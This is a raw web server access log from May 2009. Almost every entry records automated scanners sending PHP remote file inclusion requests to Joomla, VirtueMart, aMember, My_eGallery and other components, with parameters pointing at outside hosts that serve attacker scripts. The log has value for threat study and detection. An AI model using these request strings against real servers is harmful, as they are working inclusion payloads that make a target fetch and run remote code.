122.116.178.20 - - [05/May/2009:10:13:52 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [05/May/2009:10:13:52 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 200 42977 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [05/May/2009:10:13:58 -0700] "GET /logs/access_081207.log/modules/My_eGallery/index.php?basepath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.116.168.108 - - [05/May/2009:10:14:19 -0700] "GET /logs/access_080404.log%20%20/modules/My_eGallery/index.php?basepath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.116.168.108 - - [05/May/2009:10:14:20 -0700] "GET /logs/access_071227.log%20%20/modules/My_eGallery/index.php?basepath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [05/May/2009:10:14:42 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [05/May/2009:10:14:42 -0700] "GET /logs/access_080622.log/modules/My_eGallery/index.php?basepath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [05/May/2009:10:14:44 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [05/May/2009:10:14:48 -0700] "GET /logs/access_081207.log/modules/My_eGallery/index.php?basepath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:10:15:05 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:10:15:05 -0700] "GET /logs/access_090308.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:10:15:05 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:10:15:10 -0700] "GET /logs/access_090221.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [05/May/2009:10:15:36 -0700] "GET /logs/access_081104.log//index2.php?mosConfig_absolute_path=http://h1.ripway.com/yuni212/cinta.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [05/May/2009:10:15:37 -0700] "GET /index2.php?mosConfig_absolute_path=http://h1.ripway.com/yuni212/cinta.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [05/May/2009:10:15:37 -0700] "GET /logs//index2.php?mosConfig_absolute_path=http://h1.ripway.com/yuni212/cinta.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.233.69.41 - - [05/May/2009:10:15:44 -0700] "GET /logs/access_090308.log/editsite.php?returnpath=http://stelsis.ru/templates/fxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.39.184.11 - - [05/May/2009:10:15:51 -0700] "GET /logs/access_080613.log/xmlrpc.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.39.184.11 - - [05/May/2009:10:15:51 -0700] "GET /xmlrpc.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.39.184.11 - - [05/May/2009:10:15:51 -0700] "GET /logs/xmlrpc.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.53.125 - - [05/May/2009:10:16:42 -0700] "GET /logs//appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.53.125 - - [05/May/2009:10:16:42 -0700] "GET /appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.53.125 - - [05/May/2009:10:16:42 -0700] "GET /logs/access_081107.log//appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.249.84.246 - - [05/May/2009:10:16:53 -0700] "GET /logs/access_090410.log%20%20///administrator/components/com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [05/May/2009:10:16:55 -0700] "GET /logs/access_080622.log%20%20/modules/My_eGallery/index.php?basepath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [05/May/2009:10:16:55 -0700] "GET /logs/access_081207.log%20%20/modules/My_eGallery/index.php?basepath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.53.125 - - [05/May/2009:10:17:01 -0700] "GET /logs/access_090316.log//appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.53.125 - - [05/May/2009:10:17:08 -0700] "GET /logs/access_081107.log//main.php?appserv_root=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.53.125 - - [05/May/2009:10:17:08 -0700] "GET /main.php?appserv_root=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.53.125 - - [05/May/2009:10:17:08 -0700] "GET /logs//main.php?appserv_root=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.249.84.246 - - [05/May/2009:10:17:11 -0700] "GET /logs/access_090403.log%20%20///administrator/components/com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.53.125 - - [05/May/2009:10:17:14 -0700] "GET /logs/access_090316.log//main.php?appserv_root=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
122.116.178.20 - - [05/May/2009:10:17:42 -0700] "GET /logs/access_080622.log%20%20/modules/My_eGallery/index.php?basepath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [05/May/2009:10:17:43 -0700] "GET /logs/access_081207.log%20%20/modules/My_eGallery/index.php?basepath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:10:17:56 -0700] "GET /logs/access_090308.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:10:17:56 -0700] "GET /logs/access_090221.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.96.3.175 - - [05/May/2009:10:18:48 -0700] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://personales.conexion.com.py/adela/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
190.96.3.175 - - [05/May/2009:10:18:49 -0700] "GET /logs/access_090130.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://personales.conexion.com.py/adela/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
190.96.3.175 - - [05/May/2009:10:18:49 -0700] "GET /logs/access_090124.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://personales.conexion.com.py/adela/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.157.4.43 - - [05/May/2009:10:19:05 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.43 - - [05/May/2009:10:19:20 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
194.151.161.240 - - [05/May/2009:10:19:23 -0700] "GET /logs/access_080412.log/?sourcedir=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.151.161.240 - - [05/May/2009:10:19:24 -0700] "GET /logs/?sourcedir=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 200 98189 "-" "Mozilla/5.0" "www.dmulk.com"
194.151.161.240 - - [05/May/2009:10:19:25 -0700] "GET /logs/access_090223.log/?sourcedir=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.98.59.178 - - [05/May/2009:10:19:38 -0700] "GET /logs/access_081117.log//index2.php?mosConfig_absolute_path=http://h1.ripway.com/suka212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.59.178 - - [05/May/2009:10:19:44 -0700] "GET /logs/access_081117.log//index2.php?mosConfig_absolute_path=http://h1.ripway.com/windi212/idku.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.86.84.185 - - [05/May/2009:10:19:46 -0700] "GET /logs/access_080925.log//include/bbs.lib.inc.php?site_path=http://www.freewebtown.com/fatal2009/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.86.84.185 - - [05/May/2009:10:19:46 -0700] "GET /logs/access_080619.log//include/bbs.lib.inc.php?site_path=http://www.freewebtown.com/fatal2009/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.86.84.185 - - [05/May/2009:10:19:46 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.freewebtown.com/fatal2009/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.96.3.175 - - [05/May/2009:10:19:47 -0700] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://personales.conexion.com.py/adela/id.txt???? HTTP/1.1" 200 43087 "-" "libwww-perl/5.812" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:10:19:49 -0700] "GET /logs/access_081104.log//modules/punish/p_error.php?exbb[home_path]=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:10:19:49 -0700] "GET /logs/access_081104.log//modules/punish/p_error.php?exbb[home_path]=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:10:19:49 -0700] "GET /modules/punish/p_error.php?exbb[home_path]=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:10:19:50 -0700] "GET /modules/punish/p_error.php?exbb[home_path]=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:10:19:50 -0700] "GET /logs//modules/punish/p_error.php?exbb[home_path]=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:10:19:50 -0700] "GET /logs//modules/punish/p_error.php?exbb[home_path]=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.42 - - [05/May/2009:10:19:53 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.42 - - [05/May/2009:10:20:08 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
194.151.161.240 - - [05/May/2009:10:20:33 -0700] "GET /?sourcedir=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 200 42914 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:10:20:46 -0700] "GET /logs/access_080529.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.98.59.178 - - [05/May/2009:10:20:54 -0700] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://h1.ripway.com/lupa121/makan.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
65.98.59.178 - - [05/May/2009:10:20:55 -0700] "GET /snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://h1.ripway.com/lupa121/makan.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
80.86.84.185 - - [05/May/2009:10:20:57 -0700] "GET /logs/access_081205.log//include/lib.inc.php?site_path=http://www.freewebtown.com/fatal2009/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.86.84.185 - - [05/May/2009:10:20:57 -0700] "GET /include/lib.inc.php?site_path=http://www.freewebtown.com/fatal2009/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.86.84.185 - - [05/May/2009:10:20:57 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.freewebtown.com/fatal2009/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:10:21:05 -0700] "GET /logs/access_090103.log//index.php?seccion=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:10:21:06 -0700] "GET /logs/access_090103.log//index.php?seccion=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.42 - - [05/May/2009:10:21:07 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.41 - - [05/May/2009:10:21:07 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:10:21:11 -0700] "GET /logs//index.php?seccion=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:10:21:11 -0700] "GET /logs//index.php?seccion=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.158.39.180 - - [05/May/2009:10:21:12 -0700] "GET /logs/access_090415.log%20%20//virtuemart.php?mosConfig_absolute_path=http://www.sapsaree.org/bbs/data/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.158.39.180 - - [05/May/2009:10:21:12 -0700] "GET /logs//virtuemart.php?mosConfig_absolute_path=http://www.sapsaree.org/bbs/data/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.158.39.180 - - [05/May/2009:10:21:12 -0700] "GET /virtuemart.php?mosConfig_absolute_path=http://www.sapsaree.org/bbs/data/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [05/May/2009:10:21:21 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
64.157.4.42 - - [05/May/2009:10:21:22 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:21:34 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:21:34 -0700] "GET /logs/access_080723.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:21:34 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.158.39.180 - - [05/May/2009:10:21:38 -0700] "GET /logs/access.log%20%20//virtuemart.php?mosConfig_absolute_path=http://www.sapsaree.org/bbs/data/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:21:39 -0700] "GET /logs/access_090201.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:10:21:46 -0700] "GET /index.php?seccion=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 200 42987 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:10:21:49 -0700] "GET /index.php?seccion=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 200 42987 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:10:22:00 -0700] "GET /logs/access_080824.log//index.php?seccion=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:10:22:01 -0700] "GET /logs/access_080824.log//index.php?seccion=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:22:16 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:22:16 -0700] "GET /logs/access_090217.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:22:16 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:22:16 -0700] "GET /logs/access_090208.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:22:18 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:22:18 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:22:18 -0700] "GET /logs/access_090217.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:22:19 -0700] "GET /logs/access_090208.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [05/May/2009:10:22:21 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [05/May/2009:10:22:21 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [05/May/2009:10:22:22 -0700] "GET /logs/access_080918.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.86.84.185 - - [05/May/2009:10:22:57 -0700] "GET /logs/access_081205.log%20%20//include/lib.inc.php?site_path=http://www.freewebtown.com/fatal2009/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.30.81.171 - - [05/May/2009:10:23:17 -0700] "GET /logs/access_080818.log HTTP/1.0" 200 3223660 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.86.84.185 - - [05/May/2009:10:23:18 -0700] "GET /logs/access_081015.log%20%20//include/lib.inc.php?site_path=http://www.freewebtown.com/fatal2009/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:23:21 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:23:21 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:23:22 -0700] "GET /logs/access_090217.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:23:22 -0700] "GET /logs/access_090208.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:23:42 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:23:42 -0700] "GET /logs/access_080723.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:23:43 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.234.41.5 - - [05/May/2009:10:23:52 -0700] "GET /logs/access_081104.log//modules/punish/p_error.php?exbb[home_path]=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.234.41.5 - - [05/May/2009:10:23:52 -0700] "GET /modules/punish/p_error.php?exbb[home_path]=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.234.41.5 - - [05/May/2009:10:23:52 -0700] "GET /logs//modules/punish/p_error.php?exbb[home_path]=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.199.222.19 - - [05/May/2009:10:23:53 -0700] "GET /logs/access_080918.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.199.222.19 - - [05/May/2009:10:23:55 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
